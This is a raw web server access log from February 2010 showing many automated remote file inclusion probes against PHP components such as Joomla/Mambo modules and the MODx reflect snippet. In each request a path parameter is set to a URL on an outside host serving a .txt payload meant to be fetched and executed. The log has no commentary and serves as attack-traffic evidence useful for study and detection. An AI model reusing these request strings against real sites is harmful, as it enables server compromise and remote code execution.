74.205.120.218 - - [15/Feb/2010:05:25:19 -0800] "GET /logs/access_100208.log%20%20////administrator/components/com_phpshop/config.phpshop.html.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:26:24 -0800] "GET /logs/access_100202.log%20%20////administrator/components/com_phpshop/config.phpshop.html.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:26:25 -0800] "GET /logs/access_100202.log%20%20////administrator/components/com_phpshop/config.phpshop.html.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:26:39 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:26:39 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:26:39 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:26:41 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:26:41 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:26:41 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:05:27:22 -0800] "GET /board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:05:27:22 -0800] "GET /logs/access_100207.log%20%20//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [15/Feb/2010:05:27:22 -0800] "GET /logs//board//skin/board/RINIX_3//delete_all.tail.skin.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:05:28:08 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:05:28:08 -0800] "GET /logs/access_100111.log///?_SERVER[DOCUMENT_ROOT]=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:05:28:08 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:05:28:12 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:05:28:12 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [15/Feb/2010:05:28:12 -0800] "GET /logs/access_100111.log///?_SERVER[DOCUMENT_ROOT]=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:30:06 -0800] "GET /logs/access_100208.log////administrator/components/com_phpshop/config.phpshop.html.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:31:41 -0800] "GET /board.php?code=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:31:41 -0800] "GET /logs//board.php?code=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:31:41 -0800] "GET /board.php?code=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:31:41 -0800] "GET /logs/access_100112.log//board.php?code=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:31:41 -0800] "GET /logs/access_100112.log//board.php?code=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:31:42 -0800] "GET /logs//board.php?code=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:32:10 -0800] "GET /logs//bbs/kr_shop.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:32:10 -0800] "GET /logs/access_100204.log%20%20//bbs/kr_shop.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:32:11 -0800] "GET /bbs/kr_shop.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:32:29 -0800] "GET /logs/access_100115.log//board.php?code=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
85.17.139.19 - - [15/Feb/2010:05:32:34 -0800] "GET /logs/access_100115.log//board.php?code=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:32:36 -0800] "GET /logs/access_100112.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:32:36 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:32:36 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:32:36 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:32:42 -0800] "GET /logs/access_100202.log%20%20//bbs/kr_shop.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:32:42 -0800] "GET /logs/access_100112.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:32:42 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:32:42 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:05:32:43 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:32:45 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:32:45 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:32:45 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:32:55 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:32:55 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:32:55 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:32:55 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:32:55 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:32:55 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:32:59 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:32:59 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:32:59 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:33:32 -0800] "GET /logs/access_100206.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [15/Feb/2010:05:33:36 -0800] "GET /logs/access_100206.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:05:33:48 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:05:33:48 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:05:33:48 -0800] "GET /logs/access_100120.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:33:51 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:33:51 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:33:51 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:33:52 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:33:52 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:33:52 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:05:34:00 -0800] "GET /logs/access_100125.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:34:06 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:34:06 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:34:06 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:34:06 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:34:06 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:34:06 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:34:11 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:34:11 -0800] "GET /logs/access.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:34:11 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:35:11 -0800] "GET /logs//bbs/kr_shop.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:35:11 -0800] "GET /bbs/kr_shop.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:35:12 -0800] "GET /logs/access_100204.log//bbs/kr_shop.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:05:35:42 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:05:35:42 -0800] "GET /logs/access_100116.log//modules/vwar/admin/admin.php?vwar_root=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.181.217 - - [15/Feb/2010:05:35:45 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:36:07 -0800] "GET ////administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:36:07 -0800] "GET /logs/////administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:36:07 -0800] "GET /logs/access_100210.log/////administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:36:32 -0800] "GET /logs/access_100210.log/////administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:36:32 -0800] "GET ////administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:05:36:32 -0800] "GET /logs/////administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.absolute.path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:09 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:09 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:09 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:12 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:12 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:12 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:18 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:18 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:18 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:20 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:20 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:05:37:20 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:37:28 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:37:28 -0800] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:37:28 -0800] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:37:49 -0800] "GET /logs//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:37:49 -0800] "GET /appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [15/Feb/2010:05:37:49 -0800] "GET /logs/access_100115.log%20%20//appserv/main.php?appserv_root=http://artland.kr/gboard/extend/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [15/Feb/2010:05:38:28 -0800] "GET /logs/access_100125.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.252.131 - - [15/Feb/2010:05:38:34 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/auto1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.252.131 - - [15/Feb/2010:05:38:34 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/auto1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.252.131 - - [15/Feb/2010:05:38:34 -0800] "GET /logs/access_100131.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/auto1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:05:39:04 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
